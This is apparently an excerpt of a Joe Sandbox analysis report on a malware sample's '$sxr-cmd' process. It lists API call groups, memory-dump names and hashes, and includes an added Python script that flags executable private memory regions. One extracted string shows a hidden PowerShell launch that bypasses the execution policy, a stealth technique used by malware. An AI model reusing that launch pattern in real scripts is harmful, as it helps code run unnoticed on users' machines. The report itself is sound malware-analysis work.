Uniqueness Score: -1.00%

APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF6155014D6,?,?,?,00007FF6154FAA22,?,?,?,00007FF6154F847E), ref: 00007FF615501673
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6155014D6,?,?,?,00007FF6154FAA22,?,?,?,00007FF6154F847E), ref: 00007FF61550168D
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6155014D6,?,?,?,00007FF6154FAA22,?,?,?,00007FF6154F847E), ref: 00007FF615501757
• HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6155014D6,?,?,?,00007FF6154FAA22,?,?,?,00007FF6154F847E), ref: 00007FF61550176E
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6155014D6,?,?,?,00007FF6154FAA22,?,?,?,00007FF6154F847E), ref: 00007FF615501788
• HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF6155014D6,?,?,?,00007FF6154FAA22,?,?,?,00007FF6154F847E), ref: 00007FF61550179C
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$Process$Alloc$Size
• String ID:
• API String ID: 3586862581-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
• String ID:
• API String ID: 1313749407-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: Error$CurrentDirectoryModememset$EnvironmentLastVariable
• String ID:
• API String ID: 920682188-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
• C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZX, xrefs: 00007FF6154FE00B
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$FreeProcess_setjmp
• String ID: C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function ZX
• API String ID: 777023205-2484198049
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: iswdigit$iswspacewcschr
• String ID: )$=,;
• API String ID: 1959970872-2167043656
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: _wcsnicmpfprintfwcsrchr
• String ID: CMD Internal Error %s$%s$Null environment
• API String ID: 3625580822-2781220306
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
                                                                                                                      • Opcode ID: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
                                                                                                                      • Instruction ID: 023d4b828e78e936407d9e365cab6ceb2d800f2a5129076495838d2d11724087
                                                                                                                      • Opcode Fuzzy Hash: f8e4fb7eb8850db5dfc64f60f3363a5c279c997be71987712cd29a709cc65782
                                                                                                                      • Instruction Fuzzy Hash: D011BF21719B4086E350CB82E85831977B1F788FF4F840224EA5D8B7D5EF7EC9148744
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memsetwcsspn
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3809306610-0
                                                                                                                      • Opcode ID: dc78cd9d6f231a5cf0425b770118c4c3823133ec0f4f9eb011d5dfda8e43b70b
                                                                                                                      • Instruction ID: 0c6eaa80c011cc591941be8042d1a1025514b4b90c3863c70e574819712393fe
                                                                                                                      • Opcode Fuzzy Hash: dc78cd9d6f231a5cf0425b770118c4c3823133ec0f4f9eb011d5dfda8e43b70b
                                                                                                                      • Instruction Fuzzy Hash: B5B15D79A08E4686EA50CB15E4502BAA7A0FB45FE8F958032DA4EC77B5DF7DEC41C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$Current$Context
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1666949209-0
                                                                                                                      • Opcode ID: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
                                                                                                                      • Instruction ID: db0dd7d2e6e7708f9ea3eb998b4af1b49bcaca688a2ad2a3de678c9c14c124ca
                                                                                                                      • Opcode Fuzzy Hash: a98e7eacdc5a578abce32cb4d6227d29aaf631d1a1811a31ba6b33f7cbd6c913
                                                                                                                      • Instruction Fuzzy Hash: BED1BC3620AF8885EA70DB5AE49835A77B1F788B94F504116EECD4BBA6DF3DC541CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: wcschr$iswdigit$wcstol
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3841054028-0
                                                                                                                      • Opcode ID: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                                      • Instruction ID: d990389f3b9634c68cb7c8d067d4dd4bb97801826c485f4d89d80eb18bccde74
                                                                                                                      • Opcode Fuzzy Hash: c8e66ebebd8934775a16318260a5522f8ecbc9a094cbada97be1ab4c749f477c
                                                                                                                      • Instruction Fuzzy Hash: AD51A32AA08A5281E7749F2594401B9BAB1FF68FB4B458235DE5D866F4DF3CAC92C300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF615513687
                                                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6154F260D), ref: 00007FF6155136A6
                                                                                                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6154F260D), ref: 00007FF6155136EB
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF615513703
                                                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,00000000,00008000,?,00000001,00007FF6154F260D), ref: 00007FF615513722
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Console$Write_get_osfhandle$Mode
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1066134489-0
                                                                                                                      • Opcode ID: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                                                      • Instruction ID: 3e5b5a4ed98cac357e59a2aaa4f133764e63f9eab97feebfd40aaa1596b1c382
                                                                                                                      • Opcode Fuzzy Hash: 989124be994080129bedea4b9ae1d4c283fccc3ce7243235c73d6b8a7e8f68c3
                                                                                                                      • Instruction Fuzzy Hash: 7151A269B08A4287EA245F25A55457AEAA1FF44FB4F094435DE4EC37B2DF3CEC408B00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocFree
                                                                                                                      • String ID: $sxr
                                                                                                                      • API String ID: 756756679-21942930
                                                                                                                      • Opcode ID: a56984c12cd63be28461b1521c27a5cf1022700db7ead991f356a21bfefe692f
                                                                                                                      • Instruction ID: 465fd03b997bb63ed42ff3cab571e4018e78409a02091606b8be4e4fc997fed0
                                                                                                                      • Opcode Fuzzy Hash: a56984c12cd63be28461b1521c27a5cf1022700db7ead991f356a21bfefe692f
                                                                                                                      • Instruction Fuzzy Hash: 6A318D2170BF5186F615DF96E54836973B2BB44BA0F888020DF8D0BB56FB3AC4658704
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00007FF615503578: _get_osfhandle.MSVCRT ref: 00007FF615503584
                                                                                                                        • Part of subcall function 00007FF615503578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF61550359C
                                                                                                                        • Part of subcall function 00007FF615503578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035C3
                                                                                                                        • Part of subcall function 00007FF615503578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035D9
                                                                                                                        • Part of subcall function 00007FF615503578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF6155035ED
                                                                                                                        • Part of subcall function 00007FF615503578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6154F32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF615503602
                                                                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF615503491,?,?,00000000,00007FF615514420), ref: 00007FF615503514
                                                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF615503522
                                                                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF615503491,?,?,00000000,00007FF615514420), ref: 00007FF615503541
                                                                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF615503491,?,?,00000000,00007FF615514420), ref: 00007FF61550355E
                                                                                                                        • Part of subcall function 00007FF6155036EC: _get_osfhandle.MSVCRT ref: 00007FF615503715
                                                                                                                        • Part of subcall function 00007FF6155036EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF615503770
                                                                                                                        • Part of subcall function 00007FF6155036EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF615503791
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4057327938-0
                                                                                                                      • Opcode ID: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                                      • Instruction ID: 371784a28ace271bb4944c8a6d79a8428d1bec086cc18f617cb17837334e53f9
                                                                                                                      • Opcode Fuzzy Hash: 88fe3d8dcb1b39454ed35e4d5bc75a190f5634e19a67efeee45e7c5e6c767e8c
                                                                                                                      • Instruction Fuzzy Hash: CF317E29B08E42CAE7549F25A44107DEAA0EF89F65F59413ADA0EC37B6DF3CEC048700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                                                                                                      • String ID: KEYS$LIST$OFF
                                                                                                                      • API String ID: 411561164-4129271751
                                                                                                                      • Opcode ID: c38282f1f6cd5fcd5e02bcbb4014cff48c361062c3933522ffdf7c7e831c5595
                                                                                                                      • Instruction ID: bb71b73e2a9f7ba84e89895be1d6db992f6e3c488bfd02516b8a3ed58c2fe895
                                                                                                                      • Opcode Fuzzy Hash: c38282f1f6cd5fcd5e02bcbb4014cff48c361062c3933522ffdf7c7e831c5595
                                                                                                                      • Instruction Fuzzy Hash: 46213029E08E03D1F6149F29A491175EAB1EF84F70F419235D61EC62F5EF7C9C448700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%
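
A triage check for the "Memory Dump Source" entries above, added here as an example; it is not Joe Sandbox code or output. It parses the .sdmp names and the matching .jbxd snapshot names copied from this section. Assigning the fifth name field to a PAGE_* protection and the seventh to a MEM_* region type is an inference from the values on this page lining up with the winnt.h constants and is an assumption; the sixth and eighth fields are carried through undecoded. The point it surfaces: the 0000020D0B620000 dump in process index 16 ($sxr-cmd) is a private PAGE_EXECUTE_READWRITE region that the report marks as based on a PE, and it is where the functions whose API IDs name Thread/Context and Heap/Process calls were found, whereas the 00007FF6154F0000 dumps are a mapped image with ordinary section protections.

```python
"""Classify Joe Sandbox memory-dump names to locate unpacked code (added example).

Field layout of the .sdmp name is inferred from the instances on this page
(assumption): fields 5 and 7 line up with winnt.h PAGE_* and MEM_* values.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Dump and snapshot names copied from the "Memory Dump Source" and
# "Joe Sandbox IDA Plugin" lines of this section.
DUMP_NAMES = [
    "00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp",
    "00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp",
    "00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp",
    "00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp",
]
SNAPSHOT_NAMES = [
    "hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd",
    "hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd",
]

# winnt.h memory constants (documented values, not assumptions).
PAGE_NAMES = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPES = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

DUMP_RE = re.compile(
    r"^([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})"
    r"\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp$", re.I)
# Snapshot layout hcaresult_<procindex>_<stage>_<base>_<procname>.jbxd (assumption).
SNAP_RE = re.compile(r"^hcaresult_(\d+)_(\d+)_([0-9a-f]+)_(.+)\.jbxd$", re.I)


@dataclass(frozen=True)
class Dump:
    process_index: int
    stage: int
    dump_id: int
    base: int
    protect: int
    field6: int      # 0x1000 on the private dump, 0x1 on image dumps; meaning not assumed
    mem_type: int
    field8: int      # 0x0 on the private dump, 0xC on image dumps; meaning not assumed

    @property
    def protect_name(self) -> str:
        # The low byte carries the PAGE_* access value; PAGE_GUARD etc. sit above it.
        return PAGE_NAMES.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def type_name(self) -> str:
        return MEM_TYPES.get(self.mem_type, f"0x{self.mem_type:X}")


def parse_dump_name(name: str) -> Dump:
    m = DUMP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name}")
    f = m.groups()
    return Dump(int(f[0], 16), int(f[1], 16), int(f[2]), int(f[3], 16),
                int(f[4], 16), int(f[5], 16), int(f[6], 16), int(f[7], 16))


def parse_snapshot_name(name: str) -> Tuple[int, int, int, str]:
    """Return (process index, stage, base, process name) from a .jbxd name."""
    m = SNAP_RE.match(name)
    if not m:
        raise ValueError(f"not a Joe Sandbox snapshot name: {name}")
    return int(m.group(1)), int(m.group(2)), int(m.group(3), 16), m.group(4)


def classify(d: Dump) -> str:
    """Bucket a region by what its protection and type imply for triage."""
    access = d.protect & 0xFF
    executable = access >= 0x10             # PAGE_EXECUTE* values are 0x10..0x80
    writable = access in (0x04, 0x08, 0x40, 0x80)
    if d.mem_type == 0x1000000:
        return "image-code" if executable else "image-data"
    if executable and writable:
        return "private-rwx"                # usual home of an unpacked or injected PE
    if executable:
        return "private-exec"
    return "private-data"


def suspicious_regions(names: List[str]) -> List[Dump]:
    """Private, executable regions: the dumps to open first when hunting a payload."""
    dumps = [parse_dump_name(n) for n in names]
    return [d for d in dumps if classify(d) in ("private-rwx", "private-exec")]


def process_name_for(dump: Dump, snapshot_names: List[str]) -> Optional[str]:
    """Join a dump to its IDA snapshot on (process index, stage, base)."""
    for s in snapshot_names:
        idx, stage, base, proc = parse_snapshot_name(s)
        if (idx, stage, base) == (dump.process_index, dump.stage, dump.base):
            return proc
    return None


if __name__ == "__main__":
    for d in suspicious_regions(DUMP_NAMES):
        print(f"process index {d.process_index} ({process_name_for(d, SNAPSHOT_NAMES)}): "
              f"0x{d.base:X} {d.protect_name} {d.type_name} -> {classify(d)}")
```

The join on (process index, stage, base) only succeeds for the dump whose base equals the snapshot base; the 00007FF6154F1000 code dump is joined through its 00007FF6154F0000 "Associated" header dump, not directly.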

APIs
• _get_osfhandle.MSVCRT ref: 00007FF6155001C4
• GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF61550E904,?,?,?,?,00000000,00007FF615503491,?,?,00000000,00007FF615514420), ref: 00007FF6155001D6
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF61550E904,?,?,?,?,00000000,00007FF615503491,?,?,00000000,00007FF615514420), ref: 00007FF615500212
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF61550E904,?,?,?,?,00000000,00007FF615503491,?,?,00000000,00007FF615514420), ref: 00007FF615500228
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF61550E904,?,?,?,?,00000000,00007FF615503491,?,?,00000000,00007FF615514420), ref: 00007FF61550023C
